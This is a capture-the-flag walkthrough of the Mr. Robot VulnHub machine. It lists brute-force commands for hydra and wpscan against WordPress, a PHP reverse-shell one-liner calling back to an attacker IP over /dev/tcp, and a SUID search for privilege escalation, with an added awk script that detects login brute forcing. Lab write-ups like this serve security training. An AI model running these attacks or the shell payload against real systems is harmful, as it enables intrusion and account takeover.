Start with netdiscover and nmap.
gobuster turns up robots and wp:
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This also yields the first key.
fsocity = society
dir = directory = dictionary
A social-engineering wordlist. It looks like it is meant for brute forcing.
Use sort together with uniq to sort and de-duplicate the wordlist.
Enumerate users with hydra:
hydra -t 64 -L fsocity-sort.dic -p test 192.168.0.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username"
Brute-force the password with wpscan:
wpscan --url http://192.168.0.101/ --api-token xxxx --usernames Elliot --passwords fsocity-sort.dic
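Seen from the defending side, the hydra and wpscan steps above appear in the web server's access log as a burst of POST requests to /wp-login.php from one client. The script below is an added example, not part of the original write-up; the log lines are constructed, and it assumes combined log format and that WordPress answers a failed login with status 200 and a successful one with 302.

```shell
#!/usr/bin/env bash
# Added example: flag wp-login.php brute forcing in an access log.
# Assumptions: combined log format; failed login = 200, successful login = 302.

# Constructed sample log: 192.168.0.105 fails six times and then succeeds,
# 192.168.0.50 is an ordinary user who mistypes the password once.
sample_log() {
  local i
  for i in 1 2 3 4 5 6; do
    printf '192.168.0.105 - - [01/Jan/2024:10:00:0%s +0000] "POST /wp-login.php HTTP/1.1" 200 3500 "-" "-"\n' "$i"
  done
  printf '%s\n' \
    '192.168.0.105 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"' \
    '192.168.0.50 - - [01/Jan/2024:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2900 "-" "-"' \
    '192.168.0.50 - - [01/Jan/2024:10:05:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3500 "-" "-"' \
    '192.168.0.50 - - [01/Jan/2024:10:05:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"'
}

# usage: detect_wp_bruteforce THRESHOLD < access.log
# Prints one line per client with at least THRESHOLD failed logins, and whether
# a successful login (302) followed once the threshold had been reached.
detect_wp_bruteforce() {
  awk -v min="$1" '
    # Fields: $1 client IP, $6 "\"POST", $7 request path, $9 status code
    $6 == "\"POST" {
      split($7, p, "?")                 # ignore any query string
      if (p[1] != "/wp-login.php") next
      if ($9 == 200) fail[$1]++
      else if ($9 == 302 && fail[$1] >= min) hit[$1] = 1
    }
    END {
      for (ip in fail)
        if (fail[ip] >= min)
          printf "%s failed=%d success_after=%s\n", ip, fail[ip], ((ip in hit) ? "yes" : "no")
    }' | sort
}

sample_log | detect_wp_bruteforce 5
```

A client reported with success_after=yes is the case to escalate first: the account it guessed should have its password reset and its sessions invalidated.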
Reverse shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.105/1234 0>&1'");?> // write the reverse-shell statement
Got the second key.
Crack the MD5 password hash and log in.
find / -perm -u=s -type f 2>/dev/null
The third key.
Other references:
1. https://nwrzd.medium.com/vulnhub-com-mr-robot-1-walkthrough-5119586b2a3f
2. https://medium.com/@D00MFist/vulnhub-mr-robot-220348146b3b
3. https://hive.blog/security/@falconspy/mr-robot-vulnhub-walkthrough
4. https://alpinesecurity.com/blog/mr-robot-walkthrough-vulnhub/
5. https://www.infosecarticles.com/mr-robot-ctf-1-walkthrough/